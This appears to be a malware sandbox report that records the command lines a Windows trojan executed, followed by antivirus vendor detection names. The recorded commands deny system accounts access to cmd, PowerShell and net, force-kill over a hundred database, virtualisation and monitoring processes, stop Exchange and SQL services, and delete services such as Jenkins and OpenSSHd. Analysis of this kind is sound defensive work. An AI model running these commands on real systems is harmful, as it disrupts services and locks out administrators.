| cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
| cmdline | cacls C:\Users\Public /e /d "network service" |
| cmdline | cacls C:\Windows\system32\net1.exe /e /d mssqlserver |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /g Administrators:r |
| cmdline | cacls C:\Users\Public /g Administrators:f |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\SysWOW64\wscript.exe /e /d system |
| cmdline | cacls C:\Windows\system32\net.exe /e /d system |
| cmdline | cacls C:\Users\Public /e /g Users:r |
| cmdline | cacls C:\Windows\system32\wscript.exe /e /d "network service" |
| cmdline | cacls C:\Windows\system32\net1.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\system32\net.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver |
| cmdline | cacls C:\Windows\system32\wscript.exe /e /g Administrators:r |
| cmdline | cacls C:\Users\Public /e /d system |
| cmdline | cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\system32\FTP.exe /g Administrators:f |
| cmdline | cacls C:\Windows\system32\net1.exe /e /g Users:r |
| cmdline | cacls C:\Windows\system32\net1.exe /e /d "network service" |
| cmdline | cacls C:\ProgramData /e /g Administrators:r |
| cmdline | cacls C:\Windows\system32\cscript.exe /e /g Users:r |
| cmdline | cacls C:\Users\Public /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\SysWOW64\net.exe /g Administrators:f |
| cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\system32\cscript.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /d SERVICE |
| cmdline | cacls C:\Windows\system32\wscript.exe /e /g Users:r |
| cmdline | cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f |
| cmdline | cacls C:\Windows\system32\cmd.exe /e /d "network service" |
| cmdline | cacls C:\ProgramData /g Administrators:f |
| cmdline | cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\system32\wscript.exe /e /d mssqlserver |
| cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r |
| cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /d "network service" |
| cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver |
| cmdline | cacls C:\Windows\system32\FTP.exe /e /g Users:r |
| cmdline | cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F" |
| cmdline | cacls C:\ProgramData /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\system32\net1.exe /e /d system |
| cmdline | cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress |
| cmdline | cacls C:\Windows\system32\FTP.exe /e /d "network service" |
| cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d system |
| cmdline | cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f |
| cmdline | cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA" |
| cmdline | C:\Windows\system32\net1 stop MSExchangeEdgeSync |
| cmdline | net stop MSExchangeEdgeSync |
| cmdline | cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService" |
| cmdline | sc delete zyb_sync |
| Lionic | Trojan.Win32.DelShad.4!c |
| Elastic | malicious (high confidence) |
| Cynet | Malicious (score: 100) |
| CAT-QuickHeal | Trojan.Delshad |
| McAfee | RDN/Generic.tfr |
| Cylance | Unsafe |
| K7AntiVirus | Riskware ( 0040eff71 ) |
| Alibaba | Trojan:Win32/DelShad.17efacf0 |
| K7GW | Riskware ( 0040eff71 ) |
| Cybereason | malicious.b54507 |
| Arcabit | Trojan.Generic.D239A746 |
| Symantec | Trojan.Gen.MBT |
| ESET-NOD32 | a variant of Generik.FJCGWGZ |
| APEX | Malicious |
| Kaspersky | Trojan.Win32.DelShad.gol |
| BitDefender | Trojan.GenericKD.37332806 |
| NANO-Antivirus | Trojan.Win64.DelShad.ixwims |
| MicroWorld-eScan | Trojan.GenericKD.37332806 |
| Avast | Win64:Malware-gen |
| Ad-Aware | Trojan.GenericKD.37332806 |
| Sophos | Generic ML PUA (PUA) |
| DrWeb | Trojan.MulDrop18.9904 |
| TrendMicro | TROJ_GEN.R011C0PH421 |
| McAfee-GW-Edition | BehavesLike.Win64.Generic.cc |
| FireEye | Generic.mg.6b351a94a1b2da23 |
| Emsisoft | Trojan-Downloader.Agent (A) |
| MaxSecure | Trojan.Malware.300983.susgen |
| MAX | malware (ai score=88) |
| Microsoft | Trojan:Win32/Tiggre!rfn |
| GData | Trojan.GenericKD.37332806 |
| VBA32 | Trojan.Win64.MulDrop |
| ALYac | Trojan.GenericKD.37332806 |
| Malwarebytes | Trojan.PowerShell |
| TrendMicro-HouseCall | TROJ_GEN.R011C0PH421 |
| SentinelOne | Static AI - Malicious PE |
| Fortinet | W32/DelShad.GOL!tr |
| AVG | Win64:Malware-gen |
| Panda | Trj/CI.A |
| CrowdStrike | win/malicious_confidence_60% (W) |
| Qihoo-360 | Win64/Trojan.Generic.HgEASZgA |